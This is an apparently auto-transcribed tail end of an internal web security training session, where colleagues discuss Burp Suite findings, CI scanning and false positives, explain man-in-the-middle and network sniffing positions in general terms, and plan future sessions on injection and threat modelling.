How much more of Burp are you covering? Like, what's the? Do you know what the rest of the curriculum is? Looking ahead, because Burp Suite is like super useful for anyone to know.
It is, yeah, it is really good.
Yeah, I mean, problems for it has so many features. Yeah. It is one of those that you could spend probably 10 hours just on the different functionality in Burp. We'll use it a lot for different injection things when we're tempering.
Yeah.
The requests and even the responses for that. But yeah, we can do a bit more there if you think that'd be helpful.
I think it's a useful thing for a developer to, as you say, spider the site. It can really uncover some surprising things.
Yeah.
That you didn't spot.
So some of the most useful functionality for us testing in volume and quickly is in the pro version. Now the community version gives you some basic stuff. Of course, you got to pay for the nice features.
Yeah.
But yeah, it's worth learning to use an intercepting proxy.
I wonder if it's a plural site on Burp Suite.
There is.
Is there?
Yeah, look for Sunnyware. She does web app testing, web app penetration testing maybe. And I think Troy Hunt might also use Burp Suite.
So we might put a security learning pathway together because we've got a front end one, a Ruby one, a Python one just launched. Maybe we can base these sessions on the beginnings of a security one.
That could be cool.
And we link the different areas into Pluralsight primarily, and then other learning resources if people want to get deeper into it.
Yeah.
Does anybody have any comments on the session or what might be useful, what you might want to see changed if we were to deliver it again? Any feedback, helpful, positive or negative? We just want this to be useful to you.
So yeah, so you can see here in Burp, you can set this as like a target, and then you'll get the basic sort of issues that you don't really want to be testing for. Like here, you can see there's a cookie without the HTTP only flag set. So this will pick it up for you. So it will send you a request, and then you'll see in the response, it will highlight it. So it will see here that this has been set with no HTTP only flag. So normally it would say there set cookie or HTTP only as well, and secure it should say. Other bits like here, cross-site scripting filters disabled on the browser. Private IP address is disclosed. So it has loads of bits in it that will help the report.
Is there any aspect of that you can plug into like an automated build? There is.
Yeah.
And the problem we found is getting the security engineering resource or someone who knows security engineering well enough to build it in CI.
Yeah.
But that's something that's been on my to-do list for a long time. It's finding the point where, I guess, operationally, how you build the CI pipe is ready to go. In principle, it's not too difficult. And the challenge there is the trying to tune out false positives. So there's a lot of tuning activity involved because a tool cannot, virtually no tool can perfectly figure out whether these things are vulnerable.
And there's a lot of false positives in here as well. Like you might say you've got a SQL injection error just because it says error in the page that you've sent a single tick to, and in the response you'll get an error message. So you've got to manually validate lots of it as well.
You need tech people and products and enough resource to sort of absorb that tuning activity, and we've just not quite got there yet.
I think the sessions are great, and you need to stop beating yourself up because
No,
I,
that's
think
fine.
I think that they are great. Yeah.
Good.
Cool.
You made some passing comments on things like well-placed attackers, well placed.
Well placed, as in like someone who's taken a man in the position. Like that.
Yeah. I think it was on.
So, for instance, if an attacker can get a piece of malware on your machine with privileges enough to stand between your, whatever application you're using and your network communications, that's a well-placed attacker. Also, someone further down the line who, for instance, if you're using a network communication channel which isn't encrypted, if he has the capability of changing, or even just seeing what's going over the wire, that's a well-placed attacker as well. It really depends, and there are a lot of different techniques to get in those sorts of positions. Yeah. Yeah. Yeah, even a well-placed attacker who's managed to get a malicious piece of code on a web server which you're not communicating with, that code is running and firing off interesting information to attack a web
Yeah.
server. Yeah.
Or let's say someone's compromised a desktop that is not your machine, but it's on the same network. If they've got then like say Wireshark running to see all the network traffic, they will then be able to see some HTTP requests going from your machine, depending on how it's all configured. But they might be able to see requests going from your machine to a web server, or even someone, say you're at, I don't know, McDonald's Wi-Fi and you're sat next to someone else who's sniffing all the network traffic. They can see you're accessing a HTTP page unencrypted and it's all a promiscuous network. Then that's a well-placed attacker.
Or maybe they just stand up their own access point to the same Wi-Fi network name.
Yeah.
Connect to them, at which point there's everything you've ever
Yeah.
with them. Hopefully using sufficient encryption enough that they can't really do anything there, but often that's not the case. Yeah, there's so many different ways. I mean, if you're jacked into a LAN, you can attack the switch in a way that suddenly the switch will start just broadcasting everything out. And so you can pick up opportunistically everything that should be going through just one switch port to another switch port.
Yeah.
It's called a CAN table overflow. Yeah. A lot of this attack piece is about understanding vulnerabilities and how to attack them, but also tactically how to use them.
Mm.
A lot of what we've been doing here is obviously just getting that foothold, just getting the you need to authenticate yourself as someone else, and then you would use that to go on to do other things. But yeah, this is why cyber is such a big space, right? There's so much to cover and so much dedicated development expertise required to know how all these pieces fit together.
Did you come to the last session? So there was that was basically a combo attack, right? How to
Yeah.
combine vulnerabilities at different spots to become more devastating. It was recorded though, so if you ping me in the channel so I know who you are, I'll send you the video.
Yeah. So yeah, it all depends what you want to see next, really. 'Cause I'm on holiday in a couple of weeks, but after that, be good to do another one.
When are you doing this? Right?
That'll probably be Sean's.
Towards the end, the thing with threat modeling is you need to have an understanding enough of attack and how to use attack and what's susceptible to attack to do threat modeling effectively. So our idea is that we cover quite a few web-based attacks and show you how they can be used, and then do the threat modeling. And we talked from the beginning about playing a card game. We're going to sit down and get a deck of cards. A game designed to teach threat modeling. We're going to look at a system on a whiteboard and play the game and see how that goes, and see if these get the flow of threat modeling from that.
That'll be a test of our absorption, will it? If we've
Yeah.
absorbed it,
Yeah.
you'll be testing us.
Yeah, exactly. Yeah, but I've seen people attempt to teach others threat modeling. Cold, basically, without an idea of these attacks, and they're just confused because they don't really understand what the threat modeling and what the threats are.
So yeah. So I don't know what next one's going to be. Probably injection attacks of some sort. Continuing on from cross-site scripting. How you would remediate the cross-site scripting issues. Probably something like that, I'd imagine.
SQL injection.
Yeah, exactly. Yeah, SQL injection.
SQL injection, LDAP injection, there are all sorts of injections.
Yeah.
And also maybe something about how to scan log files to pick up successful hack attempts so that you can actually identify if you have been hacked.
Yeah. Yeah, could put a little bit in that.
People do that, check their logs, should be.
Yeah, that's a multifaceted challenge, but yeah, for sure.
Someone last time suggested doing one on Docker and Kubernetes.
Oh yeah, containers. Yeah.
Yeah, we're still thinking around how to do that, but yeah, that's definitely going to be included at some point. I know so much of our stuff is that, right?
Yeah.
All right, well, thanks everyone for your time again.
Thank you.
Yeah.
And
See you
thanks
next
for
time.
all the effort
It'll
you're
probably
putting
That's
be
all
into
right.
it.
about
It's
a
really
month
good.
now or so because we need to develop a content.